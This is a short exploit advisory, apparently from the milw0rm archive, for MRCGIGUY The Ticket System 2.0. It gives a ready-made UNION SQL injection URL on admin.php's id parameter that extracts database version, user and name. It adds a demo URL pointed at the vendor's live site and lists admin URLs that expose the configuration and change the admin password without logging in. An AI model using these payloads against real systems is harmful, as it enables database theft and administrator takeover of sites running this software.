MRCGIGUY The Ticket System 2.0 PHP(id) Multiple Remote Vulnerabilities Founder: ThE g0bL!N ------ Home: http:/www.4ckx.com/dz/ ---- Vendor:http://www.mrcgiguy.com Special Thx: All Muslims All Members Of Team Algerien Of FootBall Note: Algerie 3-1 Egypt Exploit: ------ SQL INJECTION: ------------- http://wwww.victim.com/admin.php?action=viewticket&id=[ SQL CODE] [ SQL CODE]=498+union+select+1,version(),3,4,user(),6,database(),8,9,10,11,12-- Demo: ---- http://www.mrcgiguy.com/tts/admin.php?action=viewticket&id=498+union+select+1,version(),3,4,user(),6,database(),8,9,10,11,12-- Note : The exploit Worked out of enter The Right information of admin :) 2) Config Information Disclousr: (out of cookies) -------------------------------------------------- go to url: --------- http://victim/tts/admin.php?action=editconfig Admin Change Password: *-------------------- http://victim.com/path/admin.php?action=editop&id=1 # milw0rm.com [2009-06-09]